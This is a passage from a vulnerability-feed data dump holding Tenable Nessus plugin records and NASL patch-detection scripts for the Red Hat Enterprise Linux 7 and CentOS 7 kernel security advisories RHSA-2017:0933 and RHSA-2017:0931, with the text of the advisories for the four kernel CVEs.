exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.16.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:26:37", "references": ["https://access.redhat.com/security/cve/cve-2016-9793", "https://access.redhat.com/security/cve/cve-2017-2636", "https://access.redhat.com/articles/2986951", "https://access.redhat.com/errata/RHSA-2017:0933", "https://access.redhat.com/security/cve/cve-2016-8650", "https://access.redhat.com/security/cve/cve-2017-2618"], "pluginID": "99346", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).", "edition": 13, "reporter": "Tenable", "published": "2017-04-13T00:00:00", "title": "RHEL 7 : kernel (RHSA-2017:0933)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2017-0933.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99346", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0933. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99346);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2018/11/10 11:49:56\");\n\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n script_xref(name:\"RHSA\", value:\"2017:0933\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2017:0933)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/2986951\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-2618\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-2636\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0933\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:26:37", "references": ["https://access.redhat.com/security/cve/cve-2016-9793", "https://access.redhat.com/errata/RHSA-2017:0931", "https://access.redhat.com/security/cve/cve-2017-2636", "https://access.redhat.com/security/cve/cve-2016-8650", "https://access.redhat.com/security/cve/cve-2017-2618"], "pluginID": "99344", "description": "An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).\n\nBug Fix(es) :\n\n* Previously, a cgroups data structure was sometimes corrupted due to\na race condition in the kernel-rt cgroups code. Consequently, several\nsystem tasks were blocked, and the operating system became\nunresponsive. This update adds a lock that prevents the race\ncondition. As a result, the cgroups data structure no longer gets\ncorrupted and the operating system no longer hangs under the described\ncircumstances. (BZ#1420784)\n\n* The kernel-rt packages have been upgraded to the 3.10.0-514.16.1\nsource tree, which provides a number of bug fixes over the previous\nversion. (BZ# 1430749)", "edition": 12, "reporter": "Tenable", "published": "2017-04-13T00:00:00", "title": "RHEL 7 : kernel-rt (RHSA-2017:0931)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo"], "id": "REDHAT-RHSA-2017-0931.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99344", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0931. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99344);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:56\");\n\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n script_xref(name:\"RHSA\", value:\"2017:0931\");\n\n script_name(english:\"RHEL 7 : kernel-rt (RHSA-2017:0931)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).\n\nBug Fix(es) :\n\n* Previously, a cgroups data structure was sometimes corrupted due to\na race condition in the kernel-rt cgroups code. Consequently, several\nsystem tasks were blocked, and the operating system became\nunresponsive. This update adds a lock that prevents the race\ncondition. As a result, the cgroups data structure no longer gets\ncorrupted and the operating system no longer hangs under the described\ncircumstances. (BZ#1420784)\n\n* The kernel-rt packages have been upgraded to the 3.10.0-514.16.1\nsource tree, which provides a number of bug fixes over the previous\nversion. (BZ# 1430749)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0931\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-2618\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-2636\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 